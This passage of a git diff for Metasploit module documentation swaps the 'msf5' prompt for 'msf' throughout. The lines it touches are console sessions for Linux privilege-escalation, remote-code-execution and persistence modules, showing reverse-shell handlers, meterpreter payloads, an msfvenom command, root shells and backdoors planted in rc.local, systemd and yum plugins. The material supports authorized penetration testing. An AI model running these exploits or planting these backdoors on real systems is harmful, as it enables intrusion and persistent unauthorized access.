msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] nmcli utility is installed diff --git a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md index a2a07cafbd..5b7910cade 100755 --- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md @@ -47,16 +47,16 @@ ### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core) ``` - msf5 > use exploit/linux/local/omniresolve_suid_priv_esc - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/omniresolve_suid_priv_esc + msf exploit(linux/local/omniresolve_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check + msf exploit(linux/local/omniresolve_suid_priv_esc) > check [+] The target is vulnerable. - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113 + msf exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113 lhost => 192.168.0.113 - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run + msf exploit(linux/local/omniresolve_suid_priv_esc) > run [*] Started reverse TCP handler on 192.168.0.113:4444 [*] Sending stage (3021284 bytes) to 192.168.0.107 diff --git a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md index 3c926dbadd..559ec0f174 100644 --- a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md @@ -47,16 +47,16 @@ ### CentOS 7.4.1708 (x64) ``` - msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 + msf > use exploit/linux/local/ptrace_sudo_token_priv_esc + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] YAMA ptrace scope is not restrictive @@ -92,16 +92,16 @@ ### Debian 9.8 (x64) ``` - msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 + msf > use exploit/linux/local/ptrace_sudo_token_priv_esc + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] YAMA ptrace scope is not restrictive diff --git a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md index dfbd61ffb2..c6f7c36efa 100644 --- a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md +++ b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md @@ -75,14 +75,14 @@ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f e # Start a handler msfconsole -msf5 > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +msf > use exploit/multi/handler +msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/handler) > set LPORT 4444 +msf exploit(multi/handler) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.1:4444 @@ -100,14 +100,14 @@ meterpreter > background In this scenario, gcc is installed so we can live compile on the system. ``` -msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 SESSION => 1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true VERBOSE => true -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Kernel version 4.15.0-13-generic appears to be vulnerable [+] pkexec is installed @@ -140,14 +140,14 @@ Server username: uid=0, gid=0, euid=0, egid=0 It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system. ``` -msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 SESSION => 1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False COMPILE => False -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > run +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Kernel version 4.15.0-13-generic appears to be vulnerable diff --git a/documentation/modules/exploit/linux/local/rc_local_persistence.md b/documentation/modules/exploit/linux/local/rc_local_persistence.md index 9b81d94d2e..6f6bfe53d4 100644 --- a/documentation/modules/exploit/linux/local/rc_local_persistence.md +++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md @@ -20,10 +20,10 @@ This module patches `/etc/rc.local` in order to launch a payload upon reboot. #### Escalate the session if needed ``` -msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo -msf5 post(multi/manage/sudo) > set session 3 +msf exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo +msf post(multi/manage/sudo) > set session 3 session => 3 -msf5 post(multi/manage/sudo) > run +msf post(multi/manage/sudo) > run [*] SUDO: Attempting to upgrade to UID 0 via sudo [*] No password available, trying a passwordless sudo. @@ -34,12 +34,12 @@ msf5 post(multi/manage/sudo) > run #### Persist ``` -msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence -msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby +msf post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence +msf exploit(multi/handler) > set payload cmd/unix/reverse_ruby payload => cmd/unix/reverse_ruby -msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41 +msf exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41 LHOST => 192.168.0.41 -msf5 exploit(linux/local/rc_local_persistence) > run +msf exploit(linux/local/rc_local_persistence) > run [*] Reading /etc/rc.local [*] Patching /etc/rc.local diff --git a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md index 9da41b49bf..30a628325b 100644 --- a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md @@ -62,12 +62,12 @@ ### Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu ``` - msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1 + msf > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check [+] System architecture x86_64 is supported [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable @@ -76,9 +76,9 @@ [+] grsecurity is not in use [+] rds.ko kernel module is loaded [*] The target appears to be vulnerable. - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System architecture x86_64 is supported diff --git a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md index 16ecc91c00..104a067b5f 100644 --- a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md @@ -62,12 +62,12 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m ## Scenarios ``` - msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1 + msf > use exploit/linux/local/rds_rds_page_copy_user_priv_esc + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ... diff --git a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md index 0dcc7e5d39..e2666e70f6 100644 --- a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md +++ b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md @@ -44,18 +44,18 @@ ### Ubuntu 18.04.3 (x64) ``` - msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1 + msf > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check [+] /reptile/reptile_cmd is executable [*] Output: uid=0(root) gid=0(root) groups=0(root) [+] Reptile is installed and loaded [+] The target is vulnerable. - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /reptile/reptile_cmd is executable diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 46d9200434..c0a3c3a08a 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -256,7 +256,7 @@ Now with a multi handler, we can catch systemd restarting the process every 10se ### systemd user (Ubuntu 16.04 Server - vagrant) - msf5 exploit(linux/local/service_persistence) > options + msf exploit(linux/local/service_persistence) > options Module options (exploit/linux/local/service_persistence): @@ -283,7 +283,7 @@ Now with a multi handler, we can catch systemd restarting the process every 10se 4 systemd user - msf5 exploit(linux/local/service_persistence) > run + msf exploit(linux/local/service_persistence) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.28.128.1:4444 diff --git a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md index 1804aa03c1..804c49dd68 100644 --- a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md +++ b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md @@ -47,13 +47,13 @@ ### Debian 9.6 (x64) ``` - msf5 exploit(multi/handler) > back - msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1 + msf exploit(multi/handler) > back + msf > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] bash shell is available diff --git a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md index 172b07f609..f14ece1001 100644 --- a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md +++ b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md @@ -45,12 +45,12 @@ ### Red Hat Enterprise Linux 5.5 (x64) ``` - msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 + msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/staprun is executable @@ -81,12 +81,12 @@ ### Fedora 13 (x86) ``` - msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 + msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/staprun is executable diff --git a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md index 334859a52e..c7755ee705 100644 --- a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md +++ b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md @@ -73,14 +73,14 @@ resource (ubuntu.rb)> exploit In this scenario, gcc is installed so we can live compile on the system. ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation -msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true +msf auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation +msf exploit(linux/local/ufo_privilege_escalation) > set verbose true verbose => true -msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1 +msf exploit(linux/local/ufo_privilege_escalation) > set session 1 session => 1 -msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1 +msf exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1 lhost => 1.1.1.1 -msf5 exploit(linux/local/ufo_privilege_escalation) > exploit +msf exploit(linux/local/ufo_privilege_escalation) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 1.1.1.1:4444 diff --git a/documentation/modules/exploit/linux/local/vmware_alsa_config.md b/documentation/modules/exploit/linux/local/vmware_alsa_config.md index 2f9bad21e3..a15927105a 100644 --- a/documentation/modules/exploit/linux/local/vmware_alsa_config.md +++ b/documentation/modules/exploit/linux/local/vmware_alsa_config.md @@ -50,12 +50,12 @@ ### Command Shell Session - VMware Player 12.5.0 (Debian 8 Jessie) ``` - msf5 > use exploit/linux/local/vmware_alsa_config - msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 + msf > use exploit/linux/local/vmware_alsa_config + msf exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/vmware_alsa_config) > set session 1 + msf exploit(linux/local/vmware_alsa_config) > set session 1 session => 1 - msf5 exploit(linux/local/vmware_alsa_config) > run + msf exploit(linux/local/vmware_alsa_config) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/pSvQHD5S5fh/afLaYVIoUm.so.c' (526 bytes) ... @@ -83,12 +83,12 @@ ### Meterpreter Session - VMware Player 12.5.0 (Debian 8 Jessie) ``` - msf5 > use exploit/linux/local/vmware_alsa_config - msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 + msf > use exploit/linux/local/vmware_alsa_config + msf exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/vmware_alsa_config) > set session 1 + msf exploit(linux/local/vmware_alsa_config) > set session 1 session => 1 - msf5 exploit(linux/local/vmware_alsa_config) > run + msf exploit(linux/local/vmware_alsa_config) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/5irkXF31Iw/GHAPsWBkjix.so.c' (527 bytes) ... diff --git a/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md b/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md index 3524bf632f..9f205f4df6 100644 --- a/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md +++ b/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md @@ -35,7 +35,7 @@ Plugin path to use default is (/usr/lib/yum-plugins/) ### Tested on Fedora 21 ``` -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions +msf exploit(linux/local/yum_package_manager_persistence) > sessions Active sessions =============== @@ -44,22 +44,22 @@ Active sessions -- ---- ---- ----------- ---------- 1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135) -msf5 exploit(linux/local/yum_package_manager_persistence) > set session 1 +msf exploit(linux/local/yum_package_manager_persistence) > set session 1 session => 1 -msf5 exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks +msf exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks plugin => langpacks -msf5 exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 +msf exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(linux/local/yum_package_manager_persistence) > exploit +msf exploit(linux/local/yum_package_manager_persistence) > exploit [*] /usr/lib/yum-plugins/langpacks.py [+] Plugins are enabled! [*] Attempting to modify plugin [*] Backdoor uploaded to /usr/local/bin/z9fJTx2wVg [*] Backdoor will run on next Yum update -msf5 exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500 +msf exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500 -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions +msf exploit(linux/local/yum_package_manager_persistence) > sessions Active sessions =============== @@ -69,7 +69,7 @@ Active sessions 1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135) 2 shell cmd/unix 172.22.222.136:4444 -> 172.22.222.135:43791 (172.22.222.135) -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions -i 2 +msf exploit(linux/local/yum_package_manager_persistence) > sessions -i 2 [*] Starting interaction with 2... id @@ -78,7 +78,7 @@ uname -a Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux exit [*] 172.22.222.135 - Command shell session 2 closed. -msf5 exploit(linux/local/yum_package_manager_persistence) > +msf exploit(linux/local/yum_package_manager_persistence) > ``` Note: Session 2 is received after running yum update on the remote host. diff --git a/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md b/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md index 057d0ac3f6..99fa33f148 100644 --- a/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md +++ b/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md @@ -34,14 +34,14 @@ This option is used to specify the port on which to listen for discovery frames ### Ubuntu 18.04 x64 ``` -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33 +msf exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk +msf exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33 RHOSTS => 192.168.159.33 -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp PAYLOAD => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check +msf exploit(linux/misc/cve_2020_13160_anydesk) > check [*] 192.168.159.33:50001 - The service is running, but could not be validated. Remote hostname: ubuntu -msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit +msf exploit(linux/misc/cve_2020_13160_anydesk) > exploit [*] Started reverse TCP handler on 192.168.250.87:4444 [*] Discovered the remote service (hostname: ubuntu, os: linux) diff --git a/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md b/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md index 59c1835fd3..6cde33f51e 100644 --- a/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md +++ b/documentation/modules/exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.md @@ -24,12 +24,12 @@ ## Scenarios ``` - msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123 + msf > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123 rhosts => 10.123.123.123 - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197 + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197 lhost => 10.1.1.197 - msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run + msf exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run [*] Started reverse TCP handler on 10.1.1.197:4444 [*] 10.123.123.123:4070 - Connecting to target diff --git a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md index 1349beeb73..df6fdf4bea 100644 --- a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md +++ b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md @@ -108,8 +108,8 @@ seconds. #### Executing Python payload on the master ``` -msf5 > use exploit/linux/misc/saltstack_salt_unauth_rce -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > show targets +msf > use exploit/linux/misc/saltstack_salt_unauth_rce +msf exploit(linux/misc/saltstack_salt_unauth_rce) > show targets Exploit targets: @@ -121,7 +121,7 @@ Exploit targets: 3 Minions (Unix command) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > options +msf exploit(linux/misc/saltstack_salt_unauth_rce) > options Module options (exploit/linux/misc/saltstack_salt_unauth_rce): @@ -154,11 +154,11 @@ Exploit target: 0 Master (Python payload) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5 +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5 rhosts => 172.28.128.5 -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1 +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1 lhost => 172.28.128.1 -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run +msf exploit(linux/misc/saltstack_salt_unauth_rce) > run [*] Started HTTPS reverse handler on https://172.28.128.1:8443 [*] 172.28.128.5:4506 - Using auxiliary/gather/saltstack_salt_root_key as check @@ -213,9 +213,9 @@ meterpreter > #### Executing Python payload on the minions ``` -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload) +msf exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload) target => Minions (Python payload) -msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run +msf exploit(linux/misc/saltstack_salt_unauth_rce) > run [*] Started HTTPS reverse handler on https://172.28.128.1:8443 [*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506 diff --git a/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md b/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md index 05129bae00..6088695fcd 100644 --- a/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md +++ b/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md @@ -54,19 +54,19 @@ Payload options (linux/mipsbe/shell_reverse_tcp): ## Scenarios ``` -msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1 +msf > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1 RHOST => 192.168.0.1 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 